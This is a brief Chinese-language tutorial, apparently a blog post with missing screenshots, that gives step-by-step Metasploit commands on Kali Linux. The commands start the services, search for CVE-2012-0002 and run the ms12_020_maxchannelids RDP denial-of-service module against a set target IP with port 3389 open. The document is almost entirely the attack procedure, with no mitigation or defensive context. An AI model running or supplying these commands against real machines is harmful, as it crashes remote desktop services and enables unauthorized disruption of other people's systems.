保证网络连通性,配置网络

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start

root@kali:~# msfconsole

wKioL1lTdiLApAAHAAMAwVaZ7zY146.jpg

前提目标主机3389端口开放

msf >search CVE_2012_0002 查找ms12_020漏洞
msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 使用ms12_020漏洞
msf >set rhost 192.168.48.100  定义***目标ip
msf >exploit

wKiom1lTdnqwAYhwAANXGA6aXVo276.jpg

wKiom1lTdn-w3_iiAAF8QITif7o729.jpg